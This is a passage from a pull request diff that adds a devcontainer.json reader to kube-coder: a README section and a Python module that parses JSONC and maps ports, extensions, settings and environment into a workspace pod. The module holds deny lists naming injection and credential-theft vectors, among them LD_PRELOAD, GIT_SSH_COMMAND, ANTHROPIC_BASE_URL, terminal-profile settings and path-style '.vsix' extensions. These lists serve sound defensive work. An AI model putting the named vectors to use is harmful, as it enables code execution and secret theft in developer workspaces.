### PR TITLE
feat(devcontainer): read a repo's own devcontainer.json (#594)

### DIFF
--- a/README.md
+++ b/README.md
@@ -136,6 +136,16 @@ Both are on the phone app too.
 
 ---
 
+## Bring your own environment — `devcontainer.json`
+
+If a repo already carries a `.devcontainer/devcontainer.json` — because it came from Codespaces, Coder, Ona or DevPod — kube-coder reads it. Forwarded ports land on the **Apps** page with their labels, VS Code extensions and settings reach code-server, `containerEnv`/`remoteEnv` reach the agents you dispatch, and the lifecycle commands are shown to you *verbatim* so you can run them with one click. Moving a project across stops being "rebuild your environment by hand" and becomes "point it at the repo."
+
+It interprets the file inside the workspace pod rather than building a container, so `features`, `image`, `build` and `dockerComposeFile` **cannot** be honoured — the pod runs as UID 1000 with no privilege escalation and there is no Docker daemon. Those come back named, with the reason and a remedy, instead of being silently dropped: a workspace that *looks* configured and isn't is the worst outcome for something whose whole job is migration.
+
+Nothing from a cloned repo ever runs on discovery. Consent is pinned to the file's hash, so if `devcontainer.json` changes between the dialog and your click the server refuses rather than running text you never read. See [`docs/devcontainer.md`](docs/devcontainer.md).
+
+---
+
 ## Build sessions & parallel agents
 
 A **build session** is an interactive Claude / Codex / Ante / OpenCode tmux session inside the pod. Start one from the dashboard, the phone app, or the API; it survives restarts, and its output is mirrored to a log you can tail from anywhere.

--- a/charts/workspace/devcontainer.py
+++ b/charts/workspace/devcontainer.py
@@ -1,0 +1,1084 @@
+"""devcontainer.json reader for kube-coder workspaces (#594).
+
+WHY THIS EXISTS. `devcontainer.json` is the file a repo already carries to
+describe its own dev environment — runtimes, setup commands, forwarded ports,
+editor extensions. Codespaces, Coder, Ona and DevPod all read it. kube-coder
+bakes its environment into one static image, so a team arriving from any of
+those has to rebuild their setup by hand. That is a migration tax, not a
+capability gap: reading the file they already have turns "rebuild everything"
+into "point it at the repo".
+
+SCOPE — we interpret the file inside the existing pod. We do not build a
+container, and we never will from here. Three verified constraints force it:
+
+  * The pod runs UID 1000 with allowPrivilegeEscalation: false
+    (templates/deployment.yaml), so `sudo` does not work at runtime. The spec
+    requires `features` to install AS ROOT AT IMAGE BUILD TIME — structurally
+    impossible here, not merely unimplemented.
+  * build.mode defaults to kaniko (values.yaml), so there is no Docker daemon.
+  * One pod is one persistent home; a nested dev container would mean two
+    filesystems and code-server/tmux/agents would have to pick one.
+
+So a large part of this module is about reporting what CANNOT be applied, with
+a reason grounded in those constraints and a remedy. Silently ignoring
+`features` would produce a workspace that looks configured and isn't — the
+worst possible failure mode for a migration feature.
+
+DESIGN — pure, like instruction_scan.py:
+
+  * Nothing here executes anything. `subprocess` is deliberately not imported.
+    The impure half (running lifecycle commands, pinning ports, writing
+    code-server settings) lives in server.py's DevcontainerManager, which can
+    reach AppsManager/EventBroker without this module importing `server` and
+    creating a cycle. Same split as skills: pure model + impure syncer.
+  * Deterministic, no LLM, no network.
+  * The three denylists (env, settings, extension ids) are the highest-value
+    code in the file. A repo-controlled `ANTHROPIC_BASE_URL` would silently
+    proxy every agent prompt through an attacker's endpoint; a repo-controlled
+    `terminal.integrated.profiles` runs a command every time the user opens a
+    terminal, forever. They matter even in a build that never executes a
+    lifecycle command.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import json
+import os
+import re
+import secrets
+import stat
+import threading
+import time
+from typing import Any, Dict, List, Optional, Tuple
+
+__all__ = [
+    'DevcontainerError',
+    'CONFIG_CANDIDATES', 'HOOKS', 'HOOK_KEYS', 'MAX_BYTES',
+    'loads_jsonc', 'strip_comments', 'strip_trailing_commas',
+    'find_config', 'parse', 'summarize',
+    'content_hash', 'hook_hash',
+    'normalize_commands', 'normalize_ports', 'normalize_extensions',
+    'normalize_settings', 'normalize_env', 'map_workspace_folder',
+    'classify_unsupported', 'substitute_vars',
+    'read_state', 'write_state', 'get_record', 'put_record', 'drop_record',
+    'boot_id', 'lifecycle_status', 'log_path_for',
+]
+
+
+class DevcontainerError(Exception):
+    """Any failure to locate, read or parse a devcontainer.json.
+
+    Carries `line`/`column` when the underlying failure was a syntax error, so
+    the UI can say "invalid at line 12, column 3" against the ORIGINAL file.
+    """
+
+    def __init__(self, message: str, line: int = 0, column: int = 0):
+        super().__init__(message)
+        self.message = message
+        self.line = line
+        self.column = column
+
+
+# ── locating the file ────────────────────────────────────────────────────────
+
+# Precedence per the spec: the canonical folder form first, then the
+# repo-root dotfile. A `.devcontainer/<name>/devcontainer.json` (the
+# multi-configuration layout) is picked up last, lowest name first so the
+# choice is deterministic rather than filesystem-order dependent.
+CONFIG_CANDIDATES = ('.devcontainer/devcontainer.json', '.devcontainer.json')
+
+# Refuse anything larger before reading it. Real configs are a few KiB; a
+# 50 MiB "devcontainer.json" is an attempt to wedge the parser, not a config.
+MAX_BYTES = 256 * 1024
+
+# Lifecycle hooks we support, in spec execution order. `initializeCommand`
+# (runs on the CLIENT, before the container exists) and `postAttachCommand`
+# (runs per editor attach, which has no analogue for a long-lived pod) are
+# deliberately absent — see UNSUPPORTED_KEYS.
+HOOKS = ('onCreate', 'updateContent', 'postCreate', 'postStart')
+HOOK_KEYS = {
+    'onCreate': 'onCreateCommand',
+    'updateContent': 'updateContentCommand',
+    'postCreate': 'postCreateCommand',
+    'postStart': 'postStartCommand',
+}
+
+
+def find_config(workdir: str) -> str:
+    """Absolute path of the devcontainer.json under `workdir`, '' if none."""
+    for rel in CONFIG_CANDIDATES:
+        path = os.path.join(workdir, *rel.split('/'))
+        if os.path.isfile(path):
+            return path
+    # .devcontainer/<folder>/devcontainer.json — deterministic pick.
+    holder = os.path.join(workdir, '.devcontainer')
+    try:
+        names = sorted(os.listdir(holder))
+    except OSError:
+        return ''
+    for name in names:
+        path = os.path.join(holder, name, 'devcontainer.json')
+        if os.path.isfile(path):
+            return path
+    return ''
+
+
+def read_raw(path: str) -> str:
+    """File text, size-capped. Raises DevcontainerError, never OSError."""
+    try:
+        size = os.stat(path).st_size
+    except OSError as e:
+        raise DevcontainerError(f'cannot stat {path}: {e}')
+    if size > MAX_BYTES:
+        raise DevcontainerError(
+            f'devcontainer.json is {size} bytes; the limit is {MAX_BYTES}')
+    try:
+        with open(path, 'r', encoding='utf-8-sig', errors='strict') as f:
+            return f.read()
+    except UnicodeDecodeError as e:
+        raise DevcontainerError(f'devcontainer.json is not valid UTF-8: {e}')
+    except OSError as e:
+        raise DevcontainerError(f'cannot read {path}: {e}')
+
+
+# ── JSONC ────────────────────────────────────────────────────────────────────
+#
+# devcontainer.json is JSON *with comments and trailing commas* — both are
+# legal and both appear in nearly every real-world file, so `json.loads` alone
+# fails on the common case. Two string-aware passes, then stdlib json. No
+# dependency: the workspace image ships no third-party JSONC parser and adding
+# one for this would be a supply-chain edge we don't need.
+#
+# Both passes preserve LENGTH and LINE COUNT: a comment character becomes a
+# space, a newline inside a block comment stays a newline. So a JSONDecodeError
+# from the third step reports a line/column that points into the ORIGINAL file.
+# That is what makes the error message honest instead of off-by-N.
+
+
+def strip_comments(text: str) -> str:
+    """Blank out // and /* */ comments, preserving offsets and line count."""
+    out: List[str] = []
+    i, n = 0, len(text)
+    in_string = False
+    while i < n:
+        ch = text[i]
+        if in_string:
+            out.append(ch)
+            if ch == '\\':
+                # Escape: copy the escaped char verbatim so a \" does not end
+                # the string and a trailing backslash cannot run off the end.
+                if i + 1 < n:
+                    out.append(text[i + 1])
+                    i += 2
+                else:
+                    i += 1
+                continue
+            if ch == '"':
+                in_string = False
+            i += 1
+            continue
+        if ch == '"':
+            in_string = True
+            out.append(ch)
+            i += 1
+            continue
+        if ch == '/' and i + 1 < n and text[i + 1] == '/':
+            while i < n and text[i] != '\n':
+                out.append(' ')
+                i += 1
+            continue
+        if ch == '/' and i + 1 < n and text[i + 1] == '*':
+            # Block comments do NOT nest in JSONC: the first */ closes.
+            end = text.find('*/', i + 2)
+            if end == -1:
+                line = text.count('\n', 0, i) + 1
+                raise DevcontainerError(
+                    'unterminated block comment', line=line,
+                    column=i - (text.rfind('\n', 0, i) + 1) + 1)
+            for k in range(i, end + 2):
+                out.append('\n' if text[k] == '\n' else ' ')
+            i = end + 2
+            continue
+        out.append(ch)
+        i += 1
+    return ''.join(out)
+
+
+def strip_trailing_commas(text: str) -> str:
+    """Blank out a comma whose next non-space character closes the container.
+
+    Runs AFTER strip_comments, so `[1, 2, // done\\n]` needs no special case:
+    the comment is already spaces and the lookahead skips it for free.
+    """
+    chars = list(text)
+    i, n = 0, len(chars)
+    in_string = False
+    while i < n:
+        ch = chars[i]
+        if in_string:
+            if ch == '\\':
+                i += 2
+                continue
+            if ch == '"':
+                in_string = False
+            i += 1
+            continue
+        if ch == '"':
+            in_string = True
+            i += 1
+            continue
+        if ch == ',':
+            j = i + 1
+            while j < n and chars[j] in ' \t\r\n':
+                j += 1
+            if j < n and chars[j] in '}]':
+                chars[i] = ' '
+        i += 1
+    return ''.join(chars)
+
+
+def loads_jsonc(text: str) -> Dict[str, Any]:
+    """Parse JSON-with-comments into a dict. Raises DevcontainerError."""
+    if isinstance(text, bytes):          # tolerate raw bytes from a caller
+        try:
+            text = text.decode('utf-8-sig')
+        except UnicodeDecodeError as e:
+            raise DevcontainerError(f'not valid UTF-8: {e}')
+    if text.startswith('﻿'):
+        # Replace rather than slice: a BOM is one character, and swapping it
+        # for a space keeps every later offset (and the error line/col) exact.
+        text = ' ' + text[1:]
+    cleaned = strip_trailing_commas(strip_comments(text))
+    try:
+        data = json.loads(cleaned)
+    except json.JSONDecodeError as e:
+        raise DevcontainerError(
+            f'invalid JSON at line {e.lineno}, column {e.colno}: {e.msg}',
+            line=e.lineno, column=e.colno)
+    if not isinstance(data, dict):
+        raise DevcontainerError(
+            'devcontainer.json must contain a JSON object at the top level')
+    return data
+
+
+# ── hashing ──────────────────────────────────────────────────────────────────
+
+
+def _canonical(obj: Any) -> str:
+    return json.dumps(obj, sort_keys=True, separators=(',', ':'),
+                      ensure_ascii=True, default=str)
+
+
+def content_hash(raw: str) -> str:
+    """Hash of the file text. Identity for the consent compare-and-swap."""
+    return hashlib.sha256(raw.encode('utf-8', 'replace')).hexdigest()
+
+
+def hook_hash(commands: List[Dict[str, Any]]) -> str:
+    """Hash of ONE hook's normalized command list.
+
+    Per hook, not per file, on purpose: a whole-file hash means editing
+    `forwardPorts` marks a successful `postCreate` stale and re-prompts the
+    user to re-run a ten-minute install that has not changed.
+    """
+    shape = [[c.get('name', ''), c.get('kind'), c.get('command')]
+             for c in (commands or [])]
+    return hashlib.sha256(_canonical(shape).encode('utf-8')).hexdigest()
+
+
+# ── variable substitution ────────────────────────────────────────────────────
+
+_VAR_RE = re.compile(r'\$\{([A-Za-z0-9_:.\-]+)\}')
+
+# ${localEnv:X} is DELIBERATELY not resolved. It would copy a workspace secret
+# (ANTHROPIC_API_KEY, GH_TOKEN, …) into a value the repo chose the name of, and
+# a postStartCommand from that same repo can read it back and POST it anywhere.
+# Reported as an unresolved caveat instead, with the literal token shown.
+_UNRESOLVABLE_PREFIXES = ('localEnv:', 'containerEnv:', 'devcontainerId')
+
+
+def substitute_vars(value: str, workdir: str) -> Tuple[str, List[str]]:
+    """Expand the workspace-folder variables. Returns (text, unresolved)."""
+    base = os.path.basename(os.path.normpath(workdir))
+    table = {
+        'workspaceFolder': workdir,
+        'containerWorkspaceFolder': workdir,
+        'localWorkspaceFolder': workdir,
+        'workspaceFolderBasename': base,
+        'containerWorkspaceFolderBasename': base,
+        'localWorkspaceFolderBasename': base,
+    }
+    unresolved: List[str] = []
+
+    def _sub(m):
+        name = m.group(1)
+        if name in table:
+            return table[name]
+        unresolved.append(m.group(0))
+        return m.group(0)
+
+    return _VAR_RE.sub(_sub, value), unresolved
+
+
+# ── lifecycle commands ───────────────────────────────────────────────────────
+
+# Tokens that mean "this needs root". The pod cannot escalate, so a command
+# containing one WILL fail — surfacing that before the user consents turns a
+# confusing 15-minute failure into an upfront, actionable warning.
+_ROOT_TOKENS = frozenset({
+    'sudo', 'su', 'apt', 'apt-get', 'aptitude', 'yum', 'dnf', 'apk', 'dpkg',
+    'rpm', 'zypper', 'docker', 'dockerd', 'systemctl', 'service', 'usermod',
+    'useradd', 'groupadd', 'chown', 'chgrp', 'update-alternatives',
+    'ldconfig', 'mount', 'setcap',
+})
+_WORD_RE = re.compile(r'[A-Za-z0-9_.\-/]+')
+
+
+def _needs_root(text: str) -> List[str]:
+    reasons = []
+    words = _WORD_RE.findall(text or '')
+    hits = sorted({w for w in words if w in _ROOT_TOKENS})
+    for h in hits:
+        reasons.append(f'`{h}` requires root')
+    for p in ('/usr/', '/etc/', '/opt/', '/var/lib/'):
+        if p in (text or '') and re.search(
+                r'(>|>>|tee|cp|mv|mkdir|install|ln)\s[^\n]*' + re.escape(p),
+                text or ''):
+            reasons.append(f'writes under {p}')
+            break
+    return reasons
+
+
+def _one_command(name: str, value: Any, workdir: str) -> Optional[Dict[str, Any]]:
+    """Normalize a single command value (string or argv list)."""
+    caveats: List[str] = []
+    if isinstance(value, str):
+        text, unresolved = substitute_vars(value, workdir)
+        if not text.strip():
+            return None
+        entry = {'name': name, 'kind': 'shell', 'command': text,
+                 'display': text}
+    elif isinstance(value, list):
+        parts = []
+        unresolved: List[str] = []
+        for item in value:
+            if not isinstance(item, (str, int, float)):
+                raise DevcontainerError(
+                    f'{name or "command"}: array entries must be strings')
+            sub, u = substitute_vars(str(item), workdir)
+            unresolved.extend(u)
+            parts.append(sub)
+        if not parts:
+            return None
+        entry = {'name': name, 'kind': 'argv', 'command': parts,
+                 'display': ' '.join(parts)}
+    else:
+        raise DevcontainerError(
+            f'{name or "command"}: expected a string, array or object')
+    if unresolved:
+        caveats.append('unresolved variables: ' + ', '.join(sorted(set(unresolved))))
+    root = _needs_root(entry['display'])
+    entry['needs_root'] = bool(root)
+    entry['root_reasons'] = root
+    entry['caveats'] = caveats
+    return entry
+
+
+def normalize_commands(value: Any, workdir: str) -> List[Dict[str, Any]]:
+    """A hook value -> an ordered list of command entries.
+
+    Three spec forms: string (run through a shell), array (exec'd directly,
+    never concatenated into a shell string), object (named commands). The spec
+    says object entries run in PARALLEL; we run them sequentially in key order.
+    Parallelism buys nothing for a handful of setup commands and it ruins both
+    failure attribution and log readability — reported as a caveat.
+    """
+    if value is None:
+        return []
+    if isinstance(value, dict):
+        out = []
+        for key in value.keys():
+            entry = _one_command(str(key), value[key], workdir)
+            if entry is not None:
+                entry['caveats'] = list(entry['caveats']) + [
+                    'runs sequentially; the spec allows parallel']
+                out.append(entry)
+        return out
+    entry = _one_command('', value, workdir)
+    return [entry] if entry is not None else []
+
+
+# ── ports ────────────────────────────────────────────────────────────────────
+
+# Mirrors AppsManager.INTERNAL_PORTS. Duplicated rather than imported because
+# this module must not import server; DevcontainerManager asserts they agree.
+INTERNAL_PORTS = frozenset({22, 2376, 5900, 6080, 6081, 7681, 8080})
+
+
+def normalize_ports(forward_ports: Any,
+                    ports_attributes: Any) -> Tuple[List[Dict[str, Any]],
+                                                    List[Dict[str, Any]]]:
+    """(accepted, skipped). Accepted entries carry the portsAttributes label."""
+    accepted: List[Dict[str, Any]] = []
+    skipped: List[Dict[str, Any]] = []
+    attrs = ports_attributes if isinstance(ports_attributes, dict) else {}
+
+    def _label(port: int) -> str:
+        a = attrs.get(str(port)) or attrs.get(port)
+        if isinstance(a, dict):
+            lbl = a.get('label')
+            if isinstance(lbl, str) and lbl.strip():
+                return lbl.strip()[:80]
+        return f'port {port}'
+
+    seen = set()
+    for raw in (forward_ports or []):
+        if isinstance(raw, bool):        # bool is an int subclass — reject first
+            skipped.append({'value': raw, 'reason': 'not a port number'})
+            continue
+        if isinstance(raw, int):
+            port = raw
+        elif isinstance(raw, str) and raw.isdigit():
+            port = int(raw)
+        elif isinstance(raw, str) and ':' in raw:
+            # "db:5432" forwards a port on ANOTHER compose service. There is no
+            # other service — this workspace is a single pod.
+            skipped.append({
+                'value': raw,
+                'reason': 'host:port forwarding targets another container; '
+                          'this workspace is a single pod'})
+            continue
+        else:
+            skipped.append({'value': raw, 'reason': 'not a port number'})
+            continue
+        if not (1 <= port <= 65535):
+            skipped.append({'value': raw, 'reason': 'port out of range'})
+            continue
+        if port in INTERNAL_PORTS:
+            skipped.append({'value': port,
+                            'reason': f'port {port} is reserved by the workspace'})
+            continue
+        if port in seen:
+            continue
+        seen.add(port)
+        accepted.append({'port': port, 'label': _label(port)})
+    return accepted, skipped
+
+
+# ── extensions ───────────────────────────────────────────────────────────────
+
+# publisher.name, optionally @version. Strict on purpose: code-server's
+# --install-extension also accepts a PATH, so a value like
+# "./evil.vsix" or "../../tmp/x.vsix" would install arbitrary editor code
+# straight out of the cloned repo, and a leading "-" would be read as a flag.
+_EXT_RE = re.compile(
+    r'^[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.[A-Za-z0-9][A-Za-z0-9_.-]{0,63}'
+    r'(@[0-9][A-Za-z0-9.\-]{0,31})?$')
+
+
+def normalize_extensions(value: Any) -> Tuple[List[str], List[Dict[str, str]]]:
+    accepted: List[str] = []
+    rejected: List[Dict[str, str]] = []
+    seen = set()
+    for raw in (value or []):
+        if not isinstance(raw, str):
+            rejected.append({'value': str(raw), 'reason': 'not a string'})
+            continue
+        ext = raw.strip()
+        low = ext.lower()
+        if not ext:
+            continue
+        if low.endswith('.vsix') or '/' in ext or '\\' in ext:
+            rejected.append({
+                'value': ext,
+                'reason': 'looks like a file path — only marketplace ids '
+                          '(publisher.name) are installed'})
+            continue
+        if not _EXT_RE.match(ext):
+            rejected.append({
+                'value': ext,
+                'reason': 'not a valid extension id (publisher.name)'})
+            continue
+        key = low.split('@', 1)[0]
+        if key in seen:
+            continue
+        seen.add(key)
+        accepted.append(ext)
+    return accepted, rejected
+
+
+# ── settings ─────────────────────────────────────────────────────────────────
+
+# code-server settings that execute code or redirect traffic. A repo that sets
+# terminal.integrated.profiles runs its command every time the user opens a
+# terminal — silently, forever, long after the repo is forgotten.
+_SETTING_DENY_PREFIXES = (
+    'terminal.integrated.defaultprofile',
+    'terminal.integrated.profiles',
+    'terminal.integrated.automationprofile',
+    'terminal.integrated.automationshell',
+    'terminal.integrated.shell',
+    'terminal.integrated.env',
+    'security.workspace.trust',
+    'remote.',
+    'http.proxy',
+    'extensions.autoupdate',
+)
+_SETTING_DENY_EXACT = ('git.path', 'npm.packagemanager', 'terminal.explorerkind')
+# Matched case-insensitively WITHOUT requiring a leading dot, so
+# `python.defaultInterpreterPath` is caught alongside `python.interpreterPath`.
+_SETTING_DENY_SUFFIXES = ('executablepath', 'interpreterpath', 'serverpath',
+                          'shellargs', 'shellpath', 'runtimeexecutable')
+_SETTING_KEY_RE = re.compile(r'^[A-Za-z0-9_][A-Za-z0-9_.\-\[\]]{0,127}$')
+_SETTING_MAX_VALUE_BYTES = 8192
+
+
+def _setting_denied(key: str) -> str:
+    low = key.lower()
+    if low in _SETTING_DENY_EXACT:
+        return 'redirects the editor at a different binary'
+    for p in _SETTING_DENY_PREFIXES:
+        if low.startswith(p):
+            return 'can run a command or redirect traffic on every editor open'
+    for s in _SETTING_DENY_SUFFIXES:
+        if low.endswith(s):
+            return 'points the editor at an executable path'
+    return ''
+
+
+def normalize_settings(value: Any) -> Tuple[Dict[str, Any], List[Dict[str, str]]]:
+    accepted: Dict[str, Any] = {}
+    denied: List[Dict[str, str]] = []
+    if not isinstance(value, dict):
+        return accepted, denied
+    for key, val in value.items():
+        if not isinstance(key, str) or not _SETTING_KEY_RE.match(key):
+            denied.append({'key': str(key)[:120], 'reason': 'invalid setting key'})
+            continue
+        reason = _setting_denied(key)
+        if reason:
+            denied.append({'key': key, 'reason': reason})
+            continue
+        try:
+            encoded = _canonical(val)
+        except (TypeError, ValueError):
+            denied.append({'key': key, 'reason': 'value is not JSON-serializable'})
+            continue
+        if len(encoded) > _SETTING_MAX_VALUE_BYTES:
+            denied.append({'key': key, 'reason': 'value is too large'})
+            continue
+        accepted[key] = val
+    return accepted, denied
+
+
+# ── environment ──────────────────────────────────────────────────────────────
+
+# THE HIGHEST-VALUE GUARD IN THIS FILE.
+#
+# ANTHROPIC_BASE_URL is the sharpest example: a repo setting it would silently
+# proxy every agent prompt — including whatever the agent reads from this
+# workspace — through an endpoint the repo author controls. LD_PRELOAD and
+# GIT_SSH_COMMAND are straight code execution; PATH and BASH_ENV reroute every
+# later command; the provider prefixes are credential capture.
+_ENV_DENY_EXACT = frozenset({
+    'PATH', 'HOME', 'SHELL', 'USER', 'LOGNAME', 'IFS', 'BASH_ENV', 'ENV',
+    'PROMPT_COMMAND', 'LD_PRELOAD', 'LD_LIBRARY_PATH', 'LD_AUDIT',
+    'DYLD_INSERT_LIBRARIES', 'GIT_SSH', 'GIT_SSH_COMMAND', 'GIT_EXTERNAL_DIFF',
+    'GIT_PAGER', 'GIT_EDITOR', 'GIT_CONFIG', 'GIT_CONFIG_GLOBAL',
+    'GIT_PROXY_COMMAND', 'PAGER', 'EDITOR', 'VISUAL', 'NODE_OPTIONS',
+    'PYTHONSTARTUP', 'PYTHONPATH', 'PERL5OPT', 'RUBYOPT',
+    'http_proxy', 'https_proxy', 'HTTP_PROXY', 'HTTPS_PROXY',
+    'NPM_CONFIG_REGISTRY', 'PIP_INDEX_URL', 'PIP_EXTRA_INDEX_URL',
+})
+_ENV_DENY_PREFIXES = ('ANTHROPIC_', 'OPENAI_', 'OPENROUTER_', 'AZURE_', 'AWS_',
+                      'GOOGLE_', 'GEMINI_', 'GH_', 'GITHUB_', 'KC_', 'CLAUDE_',
+                      'CODEX_', 'HYPERVISOR_', 'LD_', 'BASH_', 'CLOUDSDK_')
+_ENV_NAME_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]{0,127}$')
+_ENV_MAX_VALUE = 4096
+
+
+def normalize_env(value: Any, workdir: str = '/home/dev'
+                  ) -> Tuple[Dict[str, str], List[Dict[str, str]]]:
+    accepted: Dict[str, str] = {}
+    denied: List[Dict[str, str]] = []
+    if not isinstance(value, dict):
+        return accepted, denied
+    for key, val in value.items():
+        name = str(key)
+        if not _ENV_NAME_RE.match(name):
+            denied.append({'key': name[:120], 'reason': 'invalid variable name'})
+            continue
+        if name in _ENV_DENY_EXACT:
+            denied.append({
+                'key': name,
+                'reason': 'reserved — it would change how every later command '
+                          'or agent request runs'})
+            continue
+        if any(name.startswith(p) for p in _ENV_DENY_PREFIXES):
+            denied.append({
+                'key': name,
+                'reason': 'reserved prefix — these carry workspace credentials '
+                          'and agent endpoints'})
+            continue
+        if not isinstance(val, (str, int, float)) or isinstance(val, bool):
+            denied.append({'key': name, 'reason': 'value must be a string'})
+            continue
+        text, _ = substitute_vars(str(val), workdir)
+        if '\n' in text or '\r' in text or '\0' in text:
+            denied.append({'key': name, 'reason': 'value contains a newline or NUL'})
+            continue
+        if len(text) > _ENV_MAX_VALUE:
+            denied.append({'key': name, 'reason': 'value is too large'})
+            continue
+        accepted[name] = text
+    return accepted, denied
+
+
+# ── workspaceFolder ──────────────────────────────────────────────────────────
+
+
+def map_workspace_folder(workdir: str, value: Any) -> Tuple[str, str]:
+    """Map the container-side workspaceFolder onto this pod. (path, caveat).
+
+    Never trusted as a path: the declared value is container-relative
+    (`/workspaces/<repo>` under the reference implementation) and this file
+    comes from a cloned repo. Anything that does not resolve back inside
+    `workdir` is refused, not clamped.
+    """
+    if value is None:
+        return workdir, ''
+    if not isinstance(value, str) or not value.strip():
+        return workdir, 'workspaceFolder is not a string — using the project directory'
+    declared = value.strip()
+    base = os.path.basename(os.path.normpath(workdir))
+    prefix = '/workspaces/' + base
+    if declared == prefix or declared == workdir:
+        return workdir, ''
+    rel = ''
+    if declared.startswith(prefix + '/'):
+        rel = declared[len(prefix) + 1:]
+    elif declared.startswith(workdir + '/'):
+        rel = declared[len(workdir) + 1:]
+    elif not declared.startswith('/'):
+        rel = declared
+    else:
+        return workdir, (
+            f'workspaceFolder `{declared}` does not map into this workspace — '
+            'commands will run in the project directory instead')
+    candidate = os.path.normpath(os.path.join(workdir, rel))
+    root = os.path.normpath(workdir)
+    if candidate != root and not candidate.startswith(root + os.sep):
+        return workdir, (
+            f'workspaceFolder `{declared}` escapes the project directory — ignored')
+    return candidate, ''
+
+
+# ── unsupported properties ───────────────────────────────────────────────────
+#
+# Never a generic "unsupported". Every entry carries a reason grounded in this
+# pod's actual constraints plus a remedy the user can act on. Three severities:
+#   blocking — the environment the file describes cannot be produced at all
+#   partial  — we apply part of it; the rest is dropped
+#   ignored  — irrelevant here, no impact on the result
+
+_POD_ROOT_REASON = (
+    'Dev container features install as root at image-build time. This pod '
+    'runs as UID 1000 with allowPrivilegeEscalation=false, so nothing can '
+    'write to /usr.')
+
+UNSUPPORTED_KEYS: Dict[str, Tuple[str, str, str]] = {
+    'image': ('blocking',
+              "The pod's image comes from the Helm chart (image.repository / "
+              "image.tag), not from devcontainer.json.",
+              'Bake what you need into the workspace image, or install into '
+              '$HOME from postCreateCommand.'),
+    'build': ('blocking',
+              'Building an image needs a Docker daemon. build.mode defaults to '
+              'kaniko, so there is none in this pod.',
+              'Move the Dockerfile steps into the workspace image, or into '
+              'postCreateCommand where they only need $HOME.'),
+    'features': ('blocking', _POD_ROOT_REASON,
+                 'Anything that installs into $HOME or /home/dev/.local can '
+                 'move to postCreateCommand instead.'),
+    'dockerComposeFile': ('blocking',
+                          'This workspace is a single pod — there are no '
+                          'sibling services to compose.',
+                          'Run dependencies as processes in the pod (they '
+                          'show up on the Apps page), or point at a managed '
+                          'service outside the cluster.'),
+    'service': ('blocking',
+                'Compose service selection has no meaning for a single pod.',
+                'Remove it, or keep it for other tools — it is ignored here.'),
+    'runServices': ('ignored', 'Compose-only.', 'No action needed.'),
+    'overrideFeatureInstallOrder': ('ignored',
+                                    'Ordering for features, which cannot run '
+                                    'here at all.', 'No action needed.'),
+    'mounts': ('partial',
+               'Volume mounts are set by the Helm chart at pod creation; a '
+               'file inside the repo cannot add one.',
+               'The PVC at /home/dev already persists. Ask an operator to '
+               'extend the chart if you need another volume.'),
+    'runArgs': ('partial',
+                'Container run flags are the pod spec here, which the chart '
+                'owns.', 'Ask an operator if you need a capability added.'),
+    'privileged': ('blocking',
+                   'The pod sets allowPrivilegeEscalation=false and drops all '
+                   'capabilities — by design, so a cloned repo cannot ask for '
+                   'more.', 'Not available in this workspace.'),
+    'capAdd': ('blocking',
+               'All Linux capabilities are dropped in the pod securityContext.',
+               'Not available in this workspace.'),
+    'securityOpt': ('blocking', 'Security options are fixed by the pod spec.',
+                    'Not available in this workspace.'),
+    'hostRequirements': ('partial',
+                         'CPU and memory come from the chart '
+                         '(resources.requests / limits), not from the repo.',
+                         'Ask an operator to raise the workspace limits.'),
+    'initializeCommand': ('ignored',
+                          'Runs on the CLIENT before the container exists. '
+                          'There is no client here — the workspace is the '
+                          'machine.', 'Move it to onCreateCommand if it needs '
+                          'to run in the workspace.'),
+    'postAttachCommand': ('ignored',
+                          'Runs each time an editor attaches. This pod is '
+                          'long-lived and shared by code-server, ttyd and '
+                          'agents, so there is no single attach point.',
+                          'Move it to postStartCommand.'),
+    'remoteUser': ('partial',
+                   'The workspace always runs as the `dev` user (UID 1000).',
+                   'No action needed unless the file expects root.'),
+    'containerUser': ('partial',
+                      'The container user is fixed at UID 1000 by the pod '
+                      'securityContext.', 'No action needed.'),
+    'updateRemoteUserUID': ('ignored', 'UID mapping is fixed by the chart.',
+                            'No action needed.'),
+    'shutdownAction': ('ignored',
+                       'The pod lifecycle is managed by Kubernetes.',
+                       'No action needed.'),
+    'waitFor': ('ignored',
+                'Applies to the editor attach sequence, which does not exist '
+                'here.', 'No action needed.'),
+    'userEnvProbe': ('ignored', 'Shell probing is not used.', 'No action needed.'),
+    'appPort': ('partial',
+                'Host port publishing is the ingress, which the chart owns. '
+                'forwardPorts is honoured instead.',
+                'List the port under forwardPorts and it appears on the Apps '
+                'page.'),
+    'otherPortsAttributes': ('ignored',
+                             'Only explicitly forwarded ports are pinned.',
+                             'List the port under forwardPorts.'),
+}
+
+
+def classify_unsupported(cfg: Dict[str, Any],
+                         extra: Optional[List[Dict[str, str]]] = None
+                         ) -> List[Dict[str, str]]:
+    """Every declared property we cannot honour, with reason and remedy."""
+    out: List[Dict[str, str]] = []
+    for key, (severity, reason, remedy) in UNSUPPORTED_KEYS.items():
+        if key not in cfg:
+            continue
+        val = cfg[key]
+        if val in (None, '', [], {}):
+            continue
+        if key == 'features':
+            detail = ', '.join(sorted(val.keys())) if isinstance(val, dict) \
+                else str(val)
+        elif isinstance(val, (dict, list)):
+            detail = _canonical(val)[:300]
+        else:
+            detail = str(val)[:300]
+        out.append({'key': key, 'severity': severity, 'detail': detail,
+                    'reason': reason, 'remedy': remedy})
+    # customizations for other tools — named so the user knows we saw them.
+    cust = cfg.get('customizations')
+    if isinstance(cust, dict):
+        for tool in sorted(cust.keys()):
+            if tool == 'vscode':
+                continue
+            out.append({
+                'key': f'customizations.{tool}', 'severity': 'ignored',
+                'detail': '', 'reason': f'kube-coder does not run {tool}.',
+                'remedy': 'Only customizations.vscode is applied (code-server).'})
+    out.extend(extra or [])
+    order = {'blocking': 0, 'partial': 1, 'ignored': 2}
+    out.sort(key=lambda e: (order.get(e['severity'], 3), e['key']))
+    return out
+
+
+# ── parse ────────────────────────────────────────────────────────────────────
+
+
+def parse(workdir: str) -> Dict[str, Any]:
+    """Full read-through record for one workdir. Never raises.
+
+    Nothing here is stored: two stats plus one <=256 KiB read is cheaper than
+    the git branch lookup ProjectsManager.brief already does per workdir, and a
+    cache would just be a second source of truth to invalidate.
+    """
+    rec: Dict[str, Any] = {
+        'workdir': workdir, 'found': False, 'path': '', 'rel_path': '',
+        'error': '', 'error_line': 0, 'error_column': 0,
+        'config_hash': '', 'name': '', 'workspace_folder': workdir,
